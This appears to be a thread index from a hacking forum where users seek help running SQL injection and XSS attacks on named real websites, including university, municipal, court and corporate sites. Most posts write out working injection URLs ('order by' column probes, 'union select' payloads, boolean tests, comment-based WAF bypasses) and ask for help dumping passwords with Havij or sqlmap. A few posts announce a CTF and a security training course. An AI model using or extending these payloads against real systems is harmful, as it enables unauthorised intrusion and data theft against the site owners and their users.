http://www.costruttori.it/admin/

when i put a ' this page return:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.0.45-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

/admin/index.asp, line 23

its' vulnerable?

what after (no replies)

http://www.itpark.am/firm.php?lang=us&id=1064'

http://www.itpark.am/firm.php?lang=us&id=1064&apos;%20%20order%20by%20100

How to extract the number of column

agin (2 replies)

www.qq.net.au/shop/step1.php?number=859+union+select+1,2,3,4,5,6--

i cant apper column nmbr

Challenge (1 reply)

http://betshemesh.muni.il/pages.php?id=-75+Union+select+1,2,3,4,5,6,7,8,9,10--

Forbidden

can u do it

Error al mostrar página (no replies)

http://www.cavalac.com.ar/indice.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7--

where columns (no replies)

http://souldoll.com/shop/step1.php?number=1211+and+1=1+UNION ALL SELECT 1,2,3,4,5,6--

where columns

why the passowrd can't be read? (no replies)

when I use havij to inject a bug .username and email are well ,only password like this:

=wu?E?
=??
=??80+
=GN?Y"
=G??
=??D?
=wz?&$

what wrong?

PHDays Online HackQuest 2012 (no replies)

The PHDays 2012 program will include Online HackQuest (http://phdays.com/program/contests/), a competition for the Internet users that offers participants to try their hands at solving various information security tasks. On the forum?s second day, Online HackQuest participants will have a chance to influence the results of PHDays CTF 2012, an on-site contest.

Rules
For the competition, participants are provided with access to a VPN gateway. After connecting to it, the participants are to identify target systems and detect their vulnerabilities. If exploitation of a vulnerability is successful, the participant gains access to a key (a flag), which should be submitted to the jury via the form on the participant?s personal page. If the flag is valid, the participant gains the corresponding number of points.

All flags are in the MD5 format. The winner is the first participant to gain 100 points (which is the maximum possible amount). Participants who manage to gain more than 100 points are traditionally awarded with individual prizes :)

Participation Terms
Any Internet user is welcome to participate in the competition. The registration will open on the PHDays 2012 web site after the forum begins. Moreover, the Online HackQuest will also be available for out-of-competition participation during 14 days after PHDays 2012.

Prizes
Positive Technologies (the PHDays organizers) and the sponsors of the forum provide prizes and gifts for the competition.

Technical Details
The participation requires Internet connection and a possibility to establish connection to a VPN gateway via PPTP or IPSec.

help me ! I've no idear to this SQLi (1 reply)

http://www.unige.ch/sciences/chimie/confs/printconf.php?lang=en&confid=1191

i cant now the column nmbr (no replies)

haw i inect it

http://www.bonk.co.il/article.php?id=433

site take time to respond (5 replies)

this site

www.theavguide.co.uk/view_page.php?page=-18+union+select+1,2,3,4,5,6--

take many time to respond

any privet

sory my english is bad

site aspx (no replies)

http://www.fiberplast.com.tr/turkce/urunler.aspx?id=4

a weird injection... (1 reply)

web:http://jsjx.hnie.edu.cn/style.asp?id=1360

the waf show that we can't use "and update insert...."

if i inject "http://jsjx.hnie.edu.cn/style.asp?id=1360%20and%20%28select%20count%28*%29%20from%20manage%29%3E0"

it can show me some information:the table manage not exist.

But if http://jsjx.hnie.edu.cn/style.asp?id=1360%20and%20%28select%20count%28*%29%20from%20admin%29%3E0

It will appear the waf.
Any help?????

Internal Server Error (no replies)

site

www.magrabiyemen.com/contents.php?id=-3+union+select+1,2,3,4--

plz help to used older (4 replies)

site

http://www.clearviewgroup.ca/news.php?newsid=(-16)union(select+1,2,3)--

how I can used order to inject this site

full injection plz

can u help me ? (no replies)

this url:
http://www.xlsoft.com.cn/Product.asp?id=662

tools don't work.

order by 27 >>true
order by 28 >>false

when i use union select ,it doesn't work

can u help me ?

thx!

can't get column number,help...thanks (no replies)

url is http://www.tesociety.org.tw/news/news.php?Sn=151

when i used ' order by 1-- aND '1'='1 , received the error page...
how can i iject it

403 Error, WAF Bypass (2 replies)

http://www.vizaginfo.com/others/edu/pgcolleges.asp?id='19

the BackEnd dbms is MySQL, but it's hard filtered.
i try lot of way to bypass this, but for me it's really impossible!

Thx
Nerder

XSS (1 reply)

hi

I don't know how I can use xss attack in the following sites:

http://petition.adliran.ir/

and

http://adliran.ir/default_.aspx (I think it doesn't have a xss attack-but not sure)

pls guide me

vulnerable site(maybeeee oracle) (1 reply)

Hi

this site is vulnerable but i can't do it.

please giude me....

http://www.signal4you.com/index.php?option=com_content&task=view&id=926

One of the hardest WAF i ever saw (1 reply)

www.cybercomp.ba/proizvod.php?ID=1891

I tried a lot of things, the same message "Zastita". Which is "Protection" on English. Echo message -.-

Please anyone know how to bypass this ?

help to inject by sqlmap (no replies)

HI,

I want to inject to below link:

http://adliran.ir/TrmBill/Bill.aspx?CtrlId=Search

please guide me how i can do it.

mysql>5 can't get table_name (2 replies)

http://www.ngclan.hk/news.php?nID=61
http://www.ngclan.hk/news.php?nID=61 UNION SELECT 1,2,3,4,5,6,7--work well.

mysql>5 can't get column number and DB name! help (2 replies)

http://www.fss.edu.hk/news_content.php?nid=529&sorting=97

how to inject this? (no replies)

http://fzszy.chinacourt.org/public/detail.php?id=168

http://fzszy.chinacourt.org/public/detail.php?id=168'

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /opt/store/file/vhosthttpd/home/fzszy/public_html/public/include.php on line 381

but "and "\"or" can't get error!

The Art of Exploiting SQL Injection: 1 day hands on training at Black Hat US (no replies)

Hello All,

Still a few seats left on the Advanced SQL Injection course at Black Hat.

The course details and registration page can be found here:

https://www.blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_exploiting-sql-injection.html

There is a small video preview here:

http://www.youtube.com/watch?v=6pg-lRv8XTQ

Identify, extract, escalate, execute; we have got it all covered.....

iGuard Biometrics Access Control Webserver Cross Site Scripting (no replies)

iGuard Biometrics Access Control Webserver Cross Site Scripting Zeroday vulnerability !!

http://www.xc0re.net/index.php?p=1_25_iGuard-Biometrics-Access-Control-Webserver-XSS

bypass 406 access denied (2 replies)

Hi,

i've a problem in below target.i bypassed it (+/*!order*/+/*!by*/+10--) but doesn't work. guide me...

http://almas-esf.ir/site/index.php?page=product&productID=4

Very Strange Result. (4 replies)

i think that is vulnerable because when i try to put in the false codition such as AND 1=2 the page change

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+and+1=1 [true]

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+and+1=2 [false]

and when i try to inject a "ORDER BY" +query

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+order+by+3-- [false]

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+order+by+4-- [true]

the result change...
and if i try

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+order+by+2--

the result is differnt...
i'm going crazy for this injection!

I hope that anyone can help me!

BYE
Nerder!

Removed POST (no replies)

Removed POST